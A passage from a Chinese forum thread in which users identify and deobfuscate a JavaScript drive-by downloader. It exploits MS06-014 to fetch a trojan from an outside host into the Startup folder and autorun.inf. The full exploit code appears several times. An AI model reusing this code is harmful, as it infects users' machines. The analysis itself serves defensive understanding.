4,008
社区成员
发帖
与我相关
我的任务
分享运行迅雷时,发现了这段代码,应该是病毒吧?
为了防止不小心害人,我将herdow.exe改为herdow.ex
这段代码是在运行迅雷时候,弹出的MicroSoft Script Editor出现的代码。应该是将一个木马下载到你的电脑上去吧?
var id = "\x63\x6C\x61\x73\x73\x69\x64";
var id2 = "\143\154";
var id3 = "\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60";
var id4 = "\163\151\144\72\102\104\71";
var id5 = "\101\55\60\60\103\60\64";
var id6 = "\55\71\70\63";
var id7 = "\106\103\62\71\105\63\66";
var object = document.createElement("o"+"bje"+"ct");
var idx = id2+id4+id3+id6+id5+id7;
object.setAttribute(id,idx);
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open('\107\105\124','http://loveip.ddns.info/love2/herdow.ex',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
var cuteqqcn = '\\..\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\System.pif';
var cuteqqcn2 = "\103\72\134\134\115\151\143\162\157\123\157\146\164\163\56\160\151\146";
var cuteqqcn3 = "\103\72\134\134\141\165\164\157\162\165\156\56\151\156\146";
var chilam = "[AutoRun]"+"\n"+"OPEN=MicroSofts.pif"+"\n"+"shellexecute=MicroSofts.pif"+"\n"+"shell\Auto\command=MicroSofts.pif";
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialFoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
adodbStream.Type = 2;
adodbStream.OpEn();
adodbStream.WriteText=chilam;
adodbStream.Savetofile(cuteqqcn3,2);
adodbStream.Close();
adodbStream.type = 1;
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(cuteqqcn2,2);
adodbStream.SaveToFile(cuteqqcn,2);
adodbStream.Close();
}
}
userSend();
这段代码是在运行迅雷时候,弹出的MicroSoft Script Editor出现的代码。应该是将一个木马下载到你的电脑上去吧?
var id = "\x63\x6C\x61\x73\x73\x69\x64";
var id2 = "\143\154";
var id3 = "\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60";
var id4 = "\163\151\144\72\102\104\71";
var id5 = "\101\55\60\60\103\60\64";
var id6 = "\55\71\70\63";
var id7 = "\106\103\62\71\105\63\66";
var object = document.createElement("o"+"bje"+"ct");
var idx = id2+id4+id3+id6+id5+id7;
object.setAttribute(id,idx);
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open('\107\105\124','http://loveip.ddns.info/love2/herdow.ex',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
var cuteqqcn = '\\..\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\System.pif';
var cuteqqcn2 = "\103\72\134\134\115\151\143\162\157\123\157\146\164\163\56\160\151\146";
var cuteqqcn3 = "\103\72\134\134\141\165\164\157\162\165\156\56\151\156\146";
var chilam = "[AutoRun]"+"\n"+"OPEN=MicroSofts.pif"+"\n"+"shellexecute=MicroSofts.pif"+"\n"+"shell\Auto\command=MicroSofts.pif";
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialFoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
adodbStream.Type = 2;
adodbStream.OpEn();
adodbStream.WriteText=chilam;
adodbStream.Savetofile(cuteqqcn3,2);
adodbStream.Close();
adodbStream.type = 1;
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(cuteqqcn2,2);
adodbStream.SaveToFile(cuteqqcn,2);
adodbStream.Close();
}
}
userSend();
...全文
请发表友善的回复…
发表回复
UltraBejing 2008-04-30
- 打赏
- 举报
有点难度哦
owen1759 2008-01-28
- 打赏
- 举报
现在可以查杀到了
Trojan-Downloader.Win32.Banload.ela
请结帖
Trojan-Downloader.Win32.Banload.ela
请结帖
浪客 2007-10-21
- 打赏
- 举报
学习了,厉害。。
owen1759 2007-10-15
- 打赏
- 举报
还没说完
那个木马的执行文件,经过检查是用UPX加壳过的,用加壳来避免被杀是常用做法
如果您有新的病毒样本请将病毒样本压缩并加密(密码:virus)后发送到Owen1759[#]sina.com,谢谢!
那个木马的执行文件,经过检查是用UPX加壳过的,用加壳来避免被杀是常用做法
如果您有新的病毒样本请将病毒样本压缩并加密(密码:virus)后发送到Owen1759[#]sina.com,谢谢!
owen1759 2007-10-15
- 打赏
- 举报
<script>
var id = "classid";
var id2 = "cl";
var id3 = "6C556-65A3-11D0";
var id4 = "sid:BD9";
var id5 = "A-00C04";
var id6 = "-983";
var id7 = "FC29E36";
var object = document.createElement("object");
var idx = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
object.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
//以上定义这么多字符串只不过为了拼出最后这个clsid
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open( 'GET ', 'http://loveip.ddns.info/love2/herdow.ex ',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
//以上用xmlhttp向这个地址发出请求
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
var cuteqqcn = '\\..\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\System.pif ';
var cuteqqcn2 = "C:\\MicroSofts.pif";
var cuteqqcn3 = "C:\\autorun.inf";
var chilam = "[AutoRun]"+"\n"+"OPEN=MicroSofts.pif"+"\n"+"shellexecute=MicroSofts.pif"+"\n"+"shell\Auto\command=MicroSofts.pif";
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialFoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
adodbStream.Type = 2;
adodbStream.OpEn();
adodbStream.WriteText=chilam;
adodbStream.Savetofile(cuteqqcn3,2);
adodbStream.Close();
adodbStream.type = 1;
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(cuteqqcn2,2);
adodbStream.SaveToFile(cuteqqcn,2);
adodbStream.Close();
}
}
//以上把请求结果写到文件中,导致用户中毒
userSend();
</script>漏洞名称:MS06-014
漏洞内容: msadco.dll 严重漏洞
漏洞影响:远程执行代码
漏洞等级:严重
关键字:MS06-014, msadco.dll, BD96C556-65A3-11D0-983A-00C04FC29E36, mm.exe
补丁下载:http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
================================
我下载了那个地址对应的木马,确实能下载21.0 KB (21,504 字节)
看来是个免杀木马,通过了安全下载组件还通过了卡巴斯基
================================
迅雷经常被人挂马
li_net 2007-10-15
- 打赏
- 举报
学习
